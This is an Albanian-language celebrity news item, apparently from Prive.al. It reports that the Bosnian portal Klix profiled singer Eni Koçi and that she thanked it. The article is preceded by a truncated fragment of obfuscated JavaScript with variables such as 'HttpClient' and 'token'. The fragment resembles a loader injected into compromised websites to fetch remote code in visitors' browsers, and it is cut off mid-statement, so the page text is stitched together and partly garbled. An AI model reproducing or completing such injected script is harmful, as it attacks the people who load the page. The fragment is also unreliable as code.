;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çka po thonë boshnjakët për Eni Koçin

By

Këngëtarja nga Shqipëria, Eni Koçi, mjaft aktive me projekte muzikore për tregun shqiptar, së fundmi ka tejkaluar kufijtë e trevave shqipfolëse.

Ajo ka marrë vëmendjen e mediave ballkanike që i kanë kushtuar asaj shkrime në portale.

Fjala është për mediumin boshnjak Klix që ka raportuar në një historik të shkurtër në pika kryesore detaje mbi atë se kush është Eni.

Pos biografisë me zhvillimet kryesore në sferën profesionale, vëmendje i është kushtuar edhe pamjes së këngëtares.

Ajo është konsideruar si një prej femrave më të bukura në Ballkan, një bjondinë e ëmbël nga Shqipëria.

E lumtur me shkrimin që tejkalon portalet e Shqipërisë dhe Kosovës, Eni ka falemnderuar publikisht portalin në fjalë teksa motër krenare është shfaqur edhe Greta që ka paralajmëruar shumë surpriza këtë vit. /Prive.al/

Artikuj të ngjashëm